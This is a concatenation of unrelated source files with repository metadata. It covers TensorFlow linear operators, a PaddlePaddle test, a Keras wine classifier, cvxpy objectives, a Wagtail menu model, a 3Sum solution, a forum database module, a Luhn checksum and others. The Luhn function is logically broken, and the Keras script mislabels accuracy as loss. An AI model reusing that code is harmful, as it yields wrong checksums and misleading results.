  x = tf.random_normal(shape=[2, 3, 6, 2])
  operator_46.apply(x)
  ==> Shape [2, 3, 4, 2] Tensor
  ```

  #### Performance

  The performance of `LinearOperatorComposition` on any operation is equal to
  the sum of the individual operators' operations.

  #### Matrix property hints

  This `LinearOperator` is initialized with boolean flags of the form `is_X`,
  for `X = non_singular, self_adjoint, positive_definite`.
  These have the following meaning
  * If `is_X == True`, callers should expect the operator to have the
    property `X`.  This is a promise that should be fulfilled, but is *not* a
    runtime assert.  For example, finite floating point precision may result
    in these promises being violated.
  * If `is_X == False`, callers should expect the operator to not have `X`.
  * If `is_X == None` (the default), callers should have no expectation either
    way.
  """

  def __init__(self,
               operators,
               is_non_singular=None,
               is_self_adjoint=None,
               is_positive_definite=None,
               name=None):
    """Initialize a `LinearOperatorComposition`.

    `LinearOperatorComposition` is initialized with a list of operators
    `[op_1,...,op_J]`.  For the `apply` method to be well defined, the
    composition `op_i.apply(op_{i+1}(x))` must be defined.  Other methods have
    similar constraints.

    Args:
      operators:  Iterable of `LinearOperator` objects, each with
        the same `dtype` and composable shape.
      is_non_singular:  Expect that this operator is non-singular.
      is_self_adjoint:  Expect that this operator is equal to its hermitian
        transpose.
      is_positive_definite:  Expect that this operator is positive definite,
        meaning the real part of all eigenvalues is positive.  We do not require
        the operator to be self-adjoint to be positive-definite.  See:
        https://en.wikipedia.org/wiki/Positive-definite_matrix
        #Extension_for_non_symmetric_matrices
      name: A name for this `LinearOperator`.  Default is the individual
        operators names joined with `_o_`.

    Raises:
      TypeError:  If all operators do not have the same `dtype`.
      ValueError:  If `operators` is empty.
    """
    # Validate operators.
    check_ops.assert_proper_iterable(operators)
    operators = list(operators)
    if not operators:
      raise ValueError(
          "Expected a non-empty list of operators. Found: %s" % operators)
    self._operators = operators

    # Validate dtype: composition is only defined for a homogeneous dtype.
    dtype = operators[0].dtype
    for operator in operators:
      if operator.dtype != dtype:
        name_type = (str((o.name, o.dtype)) for o in operators)
        raise TypeError(
            "Expected all operators to have the same dtype.  Found %s"
            % "   ".join(name_type))

    # Auto-set and check hints.
    # A product of non-singular matrices is non-singular, so the hint may be
    # upgraded automatically — but a caller-supplied False is a contradiction.
    if all(operator.is_non_singular for operator in operators):
      if is_non_singular is False:
        raise ValueError(
            "The composition of non-singular operators is always non-singular.")
      is_non_singular = True

    # Initialization.
    graph_parents = []
    for operator in operators:
      graph_parents.extend(operator.graph_parents)

    if name is None:
      name = "_o_".join(operator.name for operator in operators)
    with ops.name_scope(name, values=graph_parents):
      super(LinearOperatorComposition, self).__init__(
          dtype=dtype,
          graph_parents=graph_parents,
          is_non_singular=is_non_singular,
          is_self_adjoint=is_self_adjoint,
          is_positive_definite=is_positive_definite,
          name=name)

  @property
  def operators(self):
    """The list of operators this composition was built from, in order."""
    return self._operators

  def _shape(self):
    # Static shape: [M_1, N_J] matrix part, with inner dimensions checked for
    # compatibility, plus the broadcast of all batch shapes.
    # Get final matrix shape.
    domain_dimension = self.operators[0].domain_dimension
    for operator in self.operators[1:]:
      domain_dimension.assert_is_compatible_with(operator.range_dimension)
      domain_dimension = operator.domain_dimension

    matrix_shape = tensor_shape.TensorShape(
        [self.operators[0].range_dimension,
         self.operators[-1].domain_dimension])

    # Get broadcast batch shape.
    # broadcast_shape checks for compatibility.
    batch_shape = self.operators[0].batch_shape
    for operator in self.operators[1:]:
      batch_shape = common_shapes.broadcast_shape(
          batch_shape, operator.batch_shape)

    return batch_shape.concatenate(matrix_shape)

  def _shape_dynamic(self):
    # Avoid messy broadcasting if possible.
    if self.shape.is_fully_defined():
      return ops.convert_to_tensor(
          self.shape.as_list(), dtype=dtypes.int32, name="shape")

    # Don't check the matrix dimensions.  That would add unnecessary Asserts to
    # the graph.  Things will fail at runtime naturally if shapes are
    # incompatible.
    matrix_shape = array_ops.stack([
        self.operators[0].range_dimension_dynamic(),
        self.operators[-1].domain_dimension_dynamic()
    ])

    # Dummy Tensor of zeros.  Will never be materialized.
    zeros = array_ops.zeros(shape=self.operators[0].batch_shape_dynamic())
    for operator in self.operators[1:]:
      zeros += array_ops.zeros(shape=operator.batch_shape_dynamic())
    batch_shape = array_ops.shape(zeros)

    return array_ops.concat_v2((batch_shape, matrix_shape), 0)

  def _apply(self, x, adjoint=False):
    # If self.operators = [A, B], and not adjoint, then
    # apply_order_list = [B, A].
    # As a result, we return A.apply(B.apply(x))
    if adjoint:
      apply_order_list = self.operators
    else:
      apply_order_list = list(reversed(self.operators))

    result = x
    for operator in apply_order_list:
      result = operator.apply(result, adjoint=adjoint)
    return result

  def _determinant(self):
    # det(A1 A2 ... AJ) = det(A1) * det(A2) * ... * det(AJ).
    result = self.operators[0].determinant()
    for operator in self.operators[1:]:
      result *= operator.determinant()
    return result

  def _log_abs_determinant(self):
    # log|det| of a product is the sum of the factors' log|det|.
    result = self.operators[0].log_abs_determinant()
    for operator in self.operators[1:]:
      result += operator.log_abs_determinant()
    return result

  def _solve(self, rhs, adjoint=False):
    # TODO(langmore) Implement solve using solve_ls if some intermediate
    # operator maps to a high dimensional space.
    # In that case, an exact solve may still be possible.

    # If self.operators = [A, B], and not adjoint, then
    # solve_order_list = [A, B].
    # As a result, we return B.solve(A.solve(x))
    if adjoint:
      solve_order_list = list(reversed(self.operators))
    else:
      solve_order_list = self.operators

    solution = rhs
    for operator in solve_order_list:
      solution = operator.solve(solution, adjoint=adjoint)
    return solution

  def _add_to_tensor(self, x):
    return self.to_dense() + x
| [
"[email protected]"
] | |
957b6dfafdf01768a405f18e1263f60e635d7d82 | 209c876b1e248fd67bd156a137d961a6610f93c7 | /python/paddle/fluid/tests/unittests/collective/fleet/test_auto_checkpoint1.py | 2db7b1e8f80682670d2ed4cf48d6df45479f95a9 | [
"Apache-2.0"
] | permissive | Qengineering/Paddle | 36e0dba37d29146ebef4fba869490ecedbf4294e | 591456c69b76ee96d04b7d15dca6bb8080301f21 | refs/heads/develop | 2023-01-24T12:40:04.551345 | 2022-10-06T10:30:56 | 2022-10-06T10:30:56 | 544,837,444 | 0 | 0 | Apache-2.0 | 2022-10-03T10:12:54 | 2022-10-03T10:12:54 | null | UTF-8 | Python | false | false | 1,771 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import os
from paddle.fluid.tests.unittests.auto_checkpoint_utils import get_logger
from test_auto_checkpoint import AutoCheckPointACLBase
paddle.enable_static()
logger = get_logger()
class AutoCheckpointTest1(AutoCheckPointACLBase):
    """Auto-checkpoint ACL test variant #1: runs the shared corner-case
    check for epoch number 0 under its own job id / checkpoint path."""

    def setUp(self):
        get_logger()
        logger.info("enter tests")

        # Snapshot the environment before injecting the checkpoint-specific
        # variables below (presumably restored by the base class's tearDown —
        # TODO confirm).
        self._old_environ = dict(os.environ)
        proc_env = {
            "PADDLE_RUNNING_ENV": "PADDLE_EDL_AUTO_CHECKPOINT",
            "PADDLE_TRAINER_ID": "0",
            "PADDLE_RUNNING_PLATFORM": "PADDLE_CLOUD",
            "PADDLE_JOB_ID": "test_job_auto_1",
            "PADDLE_EDL_HDFS_HOME": "/usr/local/hadoop-2.7.7",
            "PADDLE_EDL_HDFS_NAME": "",
            "PADDLE_EDL_HDFS_UGI": "",
            "PADDLE_EDL_HDFS_CHECKPOINT_PATH": "auto_checkpoint_1",
            "PADDLE_EDL_ONLY_FOR_CE_TEST": "1",
            "PADDLE_EDL_FS_CACHE": ".auto_checkpoint_test_1",
            "PADDLE_EDL_SAVE_CHECKPOINT_INTER": "0"
        }
        os.environ.update(proc_env)

    def test_corner_epoch_no(self):
        # Delegates to the base-class corner-case check with epoch number 0.
        self._test_corner_epoch_no(0)
# Allow running this test file directly (outside the fleet test launcher).
if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
d3336030c75230312fe64f70d821674c7b8b0832 | 744096e063ffb4cdb017f60e6dfae410a51c789a | /ml/m08_wine2_keras.py | 06ebe62cf59103482d4d188d56d1958c5811a866 | [] | no_license | elf0508/Study-bit | 59ddab507b02c13a45913c05a4799ff946e63f95 | a773d7643cbb1c0008e7ea01c32615c9e6e3678c | refs/heads/master | 2022-12-31T11:53:44.344693 | 2020-10-16T09:04:01 | 2020-10-16T09:04:01 | 270,950,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,792 | py | # keras 로 만들기
# 다중분류
import numpy as np
import pandas as pd
from keras.models import Sequential, Input
from keras.layers import Dense, Dropout
from keras.callbacks import EarlyStopping
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.preprocessing import MaxAbsScaler, RobustScaler
from sklearn.decomposition import PCA
from keras.utils import np_utils
ss = StandardScaler()
mms = MinMaxScaler()
mas = MaxAbsScaler()
rs = RobustScaler()
es = EarlyStopping(monitor = 'loss', mode = 'min', patience = 10)
pca = PCA(n_components = 10)
### 1. 데이터
wine = pd.read_csv('./data/csv/winequality-white.csv',
header = 0, index_col = None,
sep = ';', encoding = 'cp949')
print(wine.head())
print(wine.tail())
print(wine.shape) # (4898, 12)
## 1-1. 데이터 전처리
# 1-1-1. 결측치 확인
print(wine.isna()) # 확인 ok
## 1-2. numpy 파일로 변환 후 저장
wine = wine.values
print(type(wine)) # <class 'numpy.ndarray'>
print(wine)
print(wine.shape) # (4898, 12)
np.save('./data/wine_np.npy', arr = wine)
## 1-3. numpy 파일 불러오기
np.load('./data/wine_np.npy')
print(wine.shape) # (4898, 12)
## 1-4. 데이터 나누기
x = wine[:, :11]
y = wine[:, -1:]
print(x.shape) # (4898, 11)
print(y.shape) # (4898, 1)
## 1-5. train_test_split
x_train, x_test, y_train, y_test = train_test_split(
x, y, test_size = 0.25)
print(x_train.shape) # (3673, 11)
print(x_test.shape) # (1225, 11)
print(y_train.shape) # (3673, 1)
print(y_test.shape) # (1225, 1)
## 1-6. 원핫인코딩
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
print(y_train.shape) # (3673, 10)
print(y_test.shape) # (1225, 10)
## 1-7. 데이터 Scaling
rs.fit(x_train)
x_train = rs.transform(x_train)
x_test = rs.transform(x_test)
print(x_train[0]) # [0.33653846 0.21621622 0.25903614 0.01687117 0.24315068 0.12543554
# 0.31888112 0.06499518 0.41666667 0.23255814 0.77419355]
print(x_test[1]) # [0.40384615 0.10810811 0.29518072 0.01840491 0.17808219 0.04878049
# 0.38041958 0.13635487 0.4537037 0.30232558 0.32258065]
## 1-8. PCA
pca.fit(x_train)
x_train = pca.transform(x_train)
x_test = pca.transform(x_test)
print(x_train.shape) # (3673, 8)
print(x_test.shape) # (1225, 8)
# 2. 모델링
model = Sequential()
model.add(Dense(10, input_shape = (10, ), activation = 'relu'))
model.add(Dense(10))
model.add(Dense(10, activation = 'softmax'))
model.summary()
# 3. 모델 훈련
model.compile(loss = 'categorical_crossentropy', optimizer = 'adam', metrics = ['acc'])
model.fit(x_train, y_train, epochs = 10, batch_size = 32)
# 4. 모델 평가
res = model.evaluate(x_test, y_test)
print("loss : ", res[1]) # 0.5395918488502502
print("acc : ", res[1]) # 0.5395918488502502
'''
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
wine = pd.read_csv('winequality-white.csv',sep=';')
x = np.array(wine.iloc[:,0:-1])
y = np.array(wine.iloc[:,-1])
scaler = StandardScaler()
scaler.fit(x)
x = scaler.transform(x)
from sklearn.preprocessing import OneHotEncoder
y = y.reshape(-1,1)
aaa = OneHotEncoder()
aaa.fit(y)
y = aaa.transform(y).toarray()
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test, = train_test_split(
x, y, random_state=66, test_size=0.2 )
print(x_train.shape)
print(y_train.shape)
model = Sequential()
model.add(Dense(30, input_dim=11 ))
model.add(Dense(40))
model.add(Dense(120))
model.add(Dense(500,activation='relu'))
model.add(Dense(60))
model.add(Dense(32,activation='relu'))
model.add(Dense(7, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.fit(x_train, y_train, epochs=300, batch_size=10, validation_split=0.2)
loss, acc = model.evaluate(x_test,y_test)
print('keras의 acc는',acc)
# score = model.score(x_test,y_test) 이건 아마 mL model에 들어있는거니까 없다고 인식하게찌?
# print('score는',score)
# print(np.argmax(a, axis = 1)+1)
'''
| [
"[email protected]"
] | |
d15dd199e6c86808b473f526e605111671f36034 | e11dff811ca981f428644fd70d10a7369c671bcb | /src/tools/ecos/cvxpy/cvxpy/problems/objective.py | 13293559446a04fad84799c55d14674f9eada4e7 | [
"GPL-3.0-only",
"GPL-3.0-or-later",
"MIT"
] | permissive | riadnassiffe/Simulator | 3c4a036b5635534929fdb04b0e9c96d64c0da71f | 7d9ff09f26367d3714e3d10be3dd4a9817b8ed6b | refs/heads/master | 2021-06-20T09:31:36.033427 | 2021-04-17T00:03:17 | 2021-04-17T00:03:17 | 16,033,879 | 0 | 0 | MIT | 2021-03-22T23:20:34 | 2014-01-18T20:58:10 | Jupyter Notebook | UTF-8 | Python | false | false | 2,758 | py | """
Copyright 2013 Steven Diamond
This file is part of CVXPY.
CVXPY is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CVXPY is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CVXPY. If not, see <http://www.gnu.org/licenses/>.
"""
import cvxpy.utilities as u
from cvxpy.expressions.expression import Expression
import cvxpy.lin_ops.lin_utils as lu
class Minimize(u.Canonical):
    """An optimization objective of the form ``minimize <scalar expression>``."""

    NAME = "minimize"

    def __init__(self, expr):
        self._expr = Expression.cast_to_const(expr)
        # Objectives must be scalar; reject vector- or matrix-valued targets.
        if self._expr.size != (1, 1):
            raise Exception("The '%s' objective must resolve to a scalar."
                            % self.NAME)

    def __repr__(self):
        return "%s(%s)" % (self.__class__.__name__, repr(self._expr))

    def __str__(self):
        parts = [self.NAME, self._expr.name()]
        return ' '.join(parts)

    def canonicalize(self):
        """Delegate to the target expression's canonical form."""
        return self._expr.canonical_form

    def variables(self):
        """Variables appearing in the objective expression."""
        return self._expr.variables()

    def parameters(self):
        """Parameters appearing in the objective expression."""
        return self._expr.parameters()

    def is_dcp(self):
        """A minimization objective is DCP exactly when it is convex."""
        return self._expr.is_convex()

    @property
    def value(self):
        """Numeric value of the objective expression."""
        return self._expr.value

    @staticmethod
    def primal_to_result(result):
        """Map the solver's primal optimum to the objective value (identity)."""
        return result
class Maximize(Minimize):
    """An optimization objective of the form ``maximize <scalar expression>``."""

    NAME = "maximize"

    def canonicalize(self):
        """Canonicalize as minimization of the negated expression."""
        obj, constraints = super(Maximize, self).canonicalize()
        return lu.neg_expr(obj), constraints

    def is_dcp(self):
        """A maximization objective is DCP exactly when it is concave."""
        return self._expr.is_concave()

    @staticmethod
    def primal_to_result(result):
        """Negate the solver's result, since -expr was minimized internally."""
        return -result
| [
"[email protected]"
] | |
76faca35f33e12cea802b44068cb8aa14880293c | e0980f704a573894350e285f66f4cf390837238e | /.history/menus/models_20201030115229.py | fe2fb42e539b2ceeceff986fda84db20415ecd35 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | from django.db import models
from django_extensions.db.fields import AutoSlugField
from modelcluster.models import ClusterableModel
from wagtail.core.models import Orderable
from wagtail.admin.edit_handlers import FieldPanel
class MenuItem(Orderable):
    """A single navigation link inside a Menu.

    NOTE(review): the original draft referenced undefined names (``blank``,
    ``external_link``, ``internal_link``, and a bare ``open_in_new_tab``
    expression) and would fail with a NameError at import time. The fields
    below follow the conventional Wagtail menu-item pattern; confirm the
    max lengths and page target against the templates that render this menu.
    A ParentalKey back to ``Menu`` (e.g.
    ``ParentalKey('Menu', related_name='menu_items')``) is probably still
    needed before this model is usable — TODO confirm.
    """

    # Text shown for the link; optional so a linked page's own title can be used.
    link_title = models.CharField(max_length=50, blank=True, null=True)
    # External URL target (used when no internal page is linked).
    link_url = models.CharField(max_length=500, blank=True)
    # Internal page target, the counterpart to link_url.
    link_page = models.ForeignKey(
        'wagtailcore.Page',
        null=True,
        blank=True,
        related_name='+',
        on_delete=models.CASCADE,
    )
    # Whether the rendered anchor should open in a new tab (target="_blank").
    open_in_new_tab = models.BooleanField(default=False, blank=True)
class Menu(ClusterableModel):
    """A named, sluggable collection of navigation links."""

    title = models.CharField(max_length=100)
    # The slug auto-derives from the title but remains editable in the admin.
    slug = AutoSlugField(populate_from='title', editable=True)

    # Admin edit-view layout.
    panels = [
        FieldPanel('title'),
        FieldPanel('slug'),
    ]

    def __str__(self):
        return self.title
| [
"[email protected]"
] | |
a550d9b8ed43cb34d14d403265c426d95c868ae4 | 74091dce735f281188d38d2f00d1a68e1d38ff7a | /design_patterns/observer/with_observer/observer_abc/__init__.py | fc74947e39033cd126ee8f4e688bf13e5b204ab0 | [] | no_license | nbiadrytski-zz/python-training | 96741aa0ef37bda32d049fde5938191025fe2924 | 559a64aae2db51e11812cea5ff602f25953e8070 | refs/heads/master | 2023-05-07T04:08:23.898161 | 2019-12-10T12:12:59 | 2019-12-10T12:12:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | from design_patterns.observer.with_observer.observer_abc.observer_abc import AbsObserver
from design_patterns.observer.with_observer.observer_abc.subject_abc import AbsSubject | [
"[email protected]"
] | |
2fd0d81d5757eb5301956fc98513bcb6f034e338 | 7410903c6cd5ef35c592af00c934fb21c369cbf2 | /00_Code/01_LeetCode/15_3Sum.py | 48ca0cefdb8c2e3ea535801f329f89a117a056e8 | [
"MIT"
] | permissive | KartikKannapur/Algorithms | f4e4726170599db0622d18e8c06a382e9bce9e77 | 66e3c8112826aeffb78bd74d02be1a8d1e478de8 | refs/heads/master | 2020-12-25T18:32:41.086518 | 2020-10-19T02:59:47 | 2020-10-19T02:59:47 | 93,961,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,341 | py | """
Given an array S of n integers, are there elements a, b, c in S such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Note: The solution set must not contain duplicate triplets.
For example, given array S = [-1, 0, 1, 2, -1, -4],
A solution set is:
[
[-1, 0, 1],
[-1, -1, 2]
]
Your runtime beats 48.41 % of python submissions
"""
class Solution(object):
def threeSum(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
# #Special Case
if len(nums) < 3: return []
if len(nums) == 3:
if sum(nums) == 0:
return [sorted(nums)]
# #General Case
nums.sort()
res = []
for i in range(len(nums) - 2):
low = i + 1
high = len(nums) - 1
# #To handle Time Limit Exceeded Error
if i != 0 and nums[i] == nums[i - 1]:
continue
while low < high:
temp_sum = nums[i] + nums[low] + nums[high]
if temp_sum == 0:
res.append((nums[i], nums[low], nums[high]))
if temp_sum > 0:
high -= 1
else:
low += 1
# #Return unique elements
return list(set(tuple(res))) | [
"[email protected]"
] | |
28d3ad73c52557c945c1d6527b8e8b08169df786 | 7370b067695d6636273ee635b3e78b022be16a62 | /fullstack/vagrant/forum/forumdb.py | 403e89ac5b0de33e55b2add36c6f6753c544d7d6 | [] | no_license | jreiher2003/intro-to-relational-databases | 56b2f66e5f7a23144b8a1f011d0bcedcf5a07da3 | a589cb736757708635b7b6bb6688cd2d9d574a85 | refs/heads/master | 2020-12-24T13:44:50.200881 | 2015-04-14T14:45:54 | 2015-04-14T14:45:54 | 33,775,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | #
# Database access functions for the web forum.
#
import psycopg2
import time
import bleach
## Get posts from database.
def GetAllPosts():
'''Get all the posts from the database, sorted with the newest first.
Returns:
A list of dictionaries, where each dictionary has a 'content' key
pointing to the post content, and 'time' key pointing to the time
it was posted.
'''
## Database connection
DB = psycopg2.connect("dbname=forum")
c = DB.cursor()
c.execute("SELECT time, content FROM posts ORDER BY time DESC")
posts = ({'content': str(bleach.clean(row[1])), 'time': str(row[0])} for row in c.fetchall())
#DB.commit()?
DB.close()
return posts
## Add a post to the database.
def AddPost(content):
'''Add a new post to the database.
Args:
content: The text content of the new post.
'''
DB = psycopg2.connect("dbname=forum")
c = DB.cursor()
c.execute("INSERT INTO posts (content) VALUES (%s)", (content,))
DB.commit()
DB.close()
| [
"[email protected]"
] | |
d9115b79d1e0ebf6bd315330b1bc516e8c40b72b | c224200e8d273b2d215e1b68c8bb7798fe0ca714 | /python/ccard/luhn.py | 4d988dfaa53f5803ebe99205be2b09fe9e6a145e | [] | no_license | mpranj/mcandre | c9c6db22be95f71a350bf05e922eb03befa9c6b1 | 9bf5c3ab0ee24ab7041ef4732d0017e869ae683d | refs/heads/master | 2021-01-18T12:46:37.096984 | 2014-06-26T03:46:56 | 2014-06-26T03:46:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | """Luhn checksum"""
def luhn(n):
"""luhnsum(int) -> bool
Mod 10 checksum by Hans Peter Luhn (1896-1964)
"""
s = 0
while n:
r = n % 100
n /= 100
z = r % 10
r /= 10 * 2
s += r / 10 + r % 10 + z
return s % 10 == 0
| [
"[email protected]"
] | |
a7b3a447dfd2a17561d5fe2e7b964ac450fe341e | 30566a736f0c8234254c7d832333f0f8e7650c2e | /mlh/apps/qs_answer/apps.py | ba4f6dbf49192440a9295f70ca605d2b7023a213 | [] | no_license | AmirHuang/mlh | daa59f16a2ac3716195bf6dfbea0e27d9bcc994e | c0df44858d0951e345de245505ae8f71f8b5e1b6 | refs/heads/master | 2020-05-04T14:28:17.289664 | 2019-04-03T02:52:35 | 2019-04-03T02:52:35 | 179,198,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.apps import AppConfig
class QsAnswerConfig(AppConfig):
name = 'qs_answer'
| [
"[email protected]"
] | |
0dc249d0af3a80caa218ae4f6819b1a99c530f06 | 92be2d8c4a64d5f8c43341be7f1e36b81fce56ab | /src/azure-cli/azure/cli/command_modules/monitor/aaz/latest/monitor/private_link_scope/private_endpoint_connection/__cmd_group.py | 51676cfe96f1d5df414faa020e70a8f2b2eda9b2 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | allanpedroni/azure-cli | b31d3347f377208b502231266d4839196e574c4b | 4e21baa4ff126ada2bc232dff74d6027fd1323be | refs/heads/dev | 2023-08-31T18:27:03.240944 | 2023-08-31T08:49:58 | 2023-08-31T08:49:58 | 204,767,533 | 0 | 0 | MIT | 2023-09-14T13:32:41 | 2019-08-27T18:41:15 | Python | UTF-8 | Python | false | false | 718 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command_group(
"monitor private-link-scope private-endpoint-connection",
is_preview=True,
)
class __CMDGroup(AAZCommandGroup):
"""Manage private endpoint connection of a private link scope resource.
"""
pass
__all__ = ["__CMDGroup"]
| [
"[email protected]"
] | |
a6dec3fb3b780def85cc7985436fbc0609ee67c1 | 612b2dcd643ca7b36ac141a1d62c73b8e5f5d1aa | /06_operacje_na_plikach_2019-10-28/zad_3_cytaty_5_linii.py | 8b8614a0d4f0a6e66e0f536e5657adf3eda1e388 | [] | no_license | MirekPz/PyCode | e41fecb3bec8b40e41efe9db1be036038b94da1b | 95e1c349beb4fcd0ec1d8c36d000665f28ee794f | refs/heads/master | 2020-08-07T10:54:37.488009 | 2020-02-10T08:41:17 | 2020-02-10T08:41:17 | 213,421,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | """
Wyświetl tylko 5 pierwszych linii
"""
filename = "cytaty.txt"
with open(filename, encoding="UTF-8") as file:
for i in range(5):
list_of_quotations = file.readline()
print(list_of_quotations)
| [
"[email protected]"
] | |
2482f871dff5c01612e22eef2f7419c903a53bca | eb473c4b2ca6cfdfa11536a460b88f2aa6dff8c8 | /lib/dataformat/blockreplica.py | d072623269f1bd55ed55bcb45d6214af1483197b | [] | no_license | thannan6/dynamo | 4ff13bd85c9e15c755e89e67e26eaa214e0a5b39 | 8db847b8d0094890110cfc805a34703fb89f564f | refs/heads/master | 2021-05-10T00:01:52.252731 | 2018-01-22T02:35:27 | 2018-01-22T02:35:27 | 118,819,891 | 0 | 0 | null | 2018-01-24T20:45:31 | 2018-01-24T20:45:31 | null | UTF-8 | Python | false | false | 4,797 | py | from exceptions import ObjectError
class BlockReplica(object):
"""Block placement at a site. Holds an attribute 'group' which can be None.
BlockReplica size can be different from that of the Block."""
__slots__ = ['_block', '_site', 'group', 'is_complete', 'is_custodial', 'size', 'last_update', 'files']
@property
def block(self):
return self._block
@property
def site(self):
return self._site
def __init__(self, block, site, group, is_complete = False, is_custodial = False, size = -1, last_update = 0):
self._block = block
self._site = site
self.group = group
self.is_complete = is_complete
self.is_custodial = is_custodial
if size < 0:
self.size = block.size
else:
self.size = size
self.last_update = last_update
# set of File objects for incomplete replicas (not implemented)
self.files = None
def __str__(self):
return 'BlockReplica %s:%s (group=%s, is_complete=%s, size=%d, last_update=%d)' % \
(self._site.name, self._block.full_name(),
self.group.name, self.is_complete, self.size, self.last_update)
def __repr__(self):
return 'BlockReplica(block=%s, site=%s, group=%s)' % (repr(self._block), repr(self._site), repr(self.group))
def __eq__(self, other):
return self is other or \
(self._block.full_name() == other._block.full_name() and self._site.name == other._site.name and \
self.group.name == other.group.name and \
self.is_complete == other.is_complete and self.is_custodial == other.is_custodial and \
self.size == other.size and self.last_update == other.last_update)
def __ne__(self, other):
return not self.__eq__(other)
def copy(self, other):
if self._block.full_name() != other._block.full_name():
raise ObjectError('Cannot copy a replica of %s into a replica of %s', other._block.full_name(), self._block.full_name())
if self._site.name != other._site.name:
raise ObjectError('Cannot copy a replica at %s into a replica at %s', other._site.name, self._site.name)
self.group = other.group
self.is_complete = other.is_complete
self.is_custodial = other.is_custodial
self.size = other.size
self.last_update = other.last_update
def unlinked_clone(self):
block = self._block.unlinked_clone()
site = self._site.unlinked_clone()
group = self.group.unlinked_clone()
return BlockReplica(block, site, group, self.is_complete, self.is_custodial, self.size, self.last_update)
def embed_into(self, inventory, check = False):
try:
dataset = inventory.datasets[self._block.dataset.name]
except KeyError:
raise ObjectError('Unknown dataset %s', self._block.dataset.name)
block = dataset.find_block(self._block.name, must_find = True)
try:
site = inventory.sites[self._site.name]
except KeyError:
raise ObjectError('Unknown site %s', self._site.name)
try:
group = inventory.groups[self.group.name]
except KeyError:
raise ObjectError('Unknown group %s', self.group.name)
replica = block.find_replica(site)
updated = False
if replica is None:
replica = BlockReplica(block, site, group, self.is_complete, self.is_custodial, self.size, self.last_update)
dataset_replica = dataset.find_replica(site, must_find = True)
dataset_replica.block_replicas.add(replica)
block.replicas.add(replica)
site.add_block_replica(replica)
updated = True
elif check and (replica is self or replica == self):
# identical object -> return False if check is requested
pass
else:
replica.copy(self)
site.update_partitioning(replica)
updated = True
if check:
return replica, updated
else:
return replica
def delete_from(self, inventory):
dataset = inventory.datasets[self._block.dataset.name]
block = dataset.find_block(self._block.name, must_find = True)
site = inventory.sites[self._site.name]
dataset_replica = site.find_dataset_replica(dataset)
replica = block.find_replica(site, must_find = True)
site.remove_block_replica(replica)
dataset_replica.block_replicas.remove(replica)
block.replicas.remove(replica)
def write_into(self, store, delete = False):
if delete:
store.delete_blockreplica(self)
else:
store.save_blockreplica(self)
| [
"[email protected]"
] | |
851052faa0844695302437d571d870c4409cc072 | 3ef70fe63acaa665e2b163f30f1abd0a592231c1 | /stackoverflow/venv/lib/python3.6/site-packages/cryptography/hazmat/backends/openssl/x25519.py | 9aab25b86adb28ad744e0cc3682073d4dfda55a1 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | wistbean/learn_python3_spider | 14914b63691ac032955ba1adc29ad64976d80e15 | 40861791ec4ed3bbd14b07875af25cc740f76920 | refs/heads/master | 2023-08-16T05:42:27.208302 | 2023-03-30T17:03:58 | 2023-03-30T17:03:58 | 179,152,420 | 14,403 | 3,556 | MIT | 2022-05-20T14:08:34 | 2019-04-02T20:19:54 | Python | UTF-8 | Python | false | false | 5,580 | py | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import warnings
from cryptography import utils
from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.x25519 import (
X25519PrivateKey, X25519PublicKey
)
_X25519_KEY_SIZE = 32
